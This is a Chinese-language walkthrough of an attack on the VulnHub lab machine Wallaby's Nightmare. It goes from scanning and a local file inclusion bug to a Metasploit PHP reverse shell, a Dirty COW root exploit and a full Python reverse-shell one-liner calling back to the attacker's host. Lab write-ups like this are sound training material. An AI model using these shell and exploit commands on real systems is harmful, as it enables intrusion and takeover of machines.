小白的靶机VulnHub-Wallaby‘s: Nightmare (v1.0.2)

靶机地址：https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/

开机界面就是这样

还是 采用的桥接模式

确定靶机的IP地址：192.168.1.10

靶机开放了22、80端口

直接访问

随意输入一个用户名

看这个参数 /?page=

之前总结过

直接/etc/passwd

上nikto扫扫

被拒绝了请求

我淦 重新扫描一下

发现80端口关闭了。。。

但是60080端口开启了http服务

继续扫目录

有很多的目录

一个一个看一下

F12 源代码 康康

这里本地文件包含漏洞(LFI)可以执行命令

直接上msf反弹shell

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 1
target => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Using URL: http://0.0.0.0:8080/dgy2I1ywXdSR
[*] Local IP: http://192.168.1.12:8080/dgy2I1ywXdSR
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.12:8080/dgy2I1ywXdSR'));"

进行命令执行

拿到shell 之后 进入

msf exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         meterpreter php/linux  www-data (33) @ ubuntu  192.168.1.12:4444 -> 192.168.1.10:54556 (192.168.1.10)
msf exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 1245 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ cd /tmp 
cd /tmp

脏牛的提权文件，看这里

但是我下载不来 总是被拒绝 头疼

这边 我python 进入pty

然后我靶机下载被拒绝了

然后我下载到kali上 开启python服务

进行下载

可以看到下载成功了

进行gcc 编译

命令：gcc cowroot.c -o dayu -pthread

运行一下

可以看到已经拿到root权限了

这是利用的脏牛提权 这个提权方法 还得继续学习一下

成功拿到flag

这里非常不推荐脏牛提权 系统就直接崩溃了

使用python的反弹shell kali本地开启监听

这个之前也写过

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.12",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali本地开启监听 8888端口 也可以拿到低权限的shell

还有一种反弹shell

kali本身php的反弹shell脚本

在这里：/usr/share/webshells/php/php-reverse-shell.php

修改为kali本身的IP 本地开启监听1234端口 一样可以拿到低权限的shell